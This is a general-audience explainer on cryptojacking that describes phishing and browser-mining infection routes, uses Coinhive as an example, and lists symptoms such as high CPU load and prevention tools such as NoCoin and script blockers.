Cryptojacking (also known as "malicious mining") is a relatively recent online threat. Malicious objects associated with this threat hide on computers or mobile devices and use their resources for the mining of electronic currencies - cryptocurrencies. This threat is actively evolving, acquiring new forms: it hijacks Internet browsers, affects all types of devices - from desktops and laptops to smartphones and even network servers.

As with other malware attacks, the main motive behind this vermin of computing is profit, but unlike other threats, malicious objects of this type try to hide their presence from the user. The hidden nature of cryptojacking is very attractive to cybercriminals due to the possibility of making more money for less risk - the risk of being caught and identified.

Understand how it works

To use people's devices for the purpose of mining cryptocurrencies, hackers use several methods:

• Infection via email using phishing tactics. When you click on a link or download an email attachment, malicious code is launched within a few seconds and installs its script on the computer. After that, the illegally installed script runs quietly unnoticed in the background;
• Infection by visiting malicious websites or viewing online advertisements. This method is known as browser mining. Since JavaScript is present on almost every website, it is possible to inject malicious script into the source code of web pages.

Hackers break into high traffic websites in order to insert their scripts. Some online companies also use malicious scripts as a way to generate alternative income for their businesses. Scripts usually use few resources and do not interfere with overall computer use, making them incredibly difficult to detect.

Vivid Example: Coinhive

It is the most popular cryptojacking malware. It is an open-source Javascript miner for Monero that can be embedded into any website. When users visit a site with embedded code, they start mining Monero (XMR) using the power of the processor. The virus is embedded in ad blockers, free files, or any other popular programs that an attacker can manage to infect. Any user can use Coinhive on their website to use innocent people who come to the resource for profit. One can find out if the Coin Hive site is working by checking its source code.

How to detect?

Signs of a malicious cryptojacking can be noticed on one’s own. The symptoms of infection are:

• Sluggish performance or unusually slow response times;
• Overheating of the device;
• High processor load (can be checked in the task manager).

When you visit a particular web page, the device is exposed to cryptojacking - the responsiveness of the system is drastically reduced (the browser and other running processes are slowed down). If you have noticed this sign, you must immediately check the CPU. When the processor is 100% loaded, the reason may be mining in the browser infection. To stop this, one must close the tab in the browser, after opening which the system began to behave strangely.

Sometimes, in order to detect crypto jacking, it is enough to pay attention to the sound of your coolers - if after opening a certain site, the cooling fans suddenly begin to emit such a hum, it is likely that someone is mining digital coins at your expense.

How to prevent it?

There are browser extensions that can effectively prevent most cryptojacking attacks over the Internet. We also recommend users to update their operating system along with antivirus software. 

Here are some tools and plugins to help you avoid these types of threats:

• Anti-mining NoCoin is an extension available for Chrome, Firefox, Opera browsers. The tool can block a wide variety of web miners, including Coinhive;
• No Script (Firefox Extension) / Script Safe (Chrome Extension) are extensions that can be used to block JavaScript. However, such extensions can be quite aggressive and interfere with the normal functioning of other websites;
• Adblocker is an embedded ad blocking app to help prevent cryptocurrency mining. Ad Blocker settings depend on the browser used.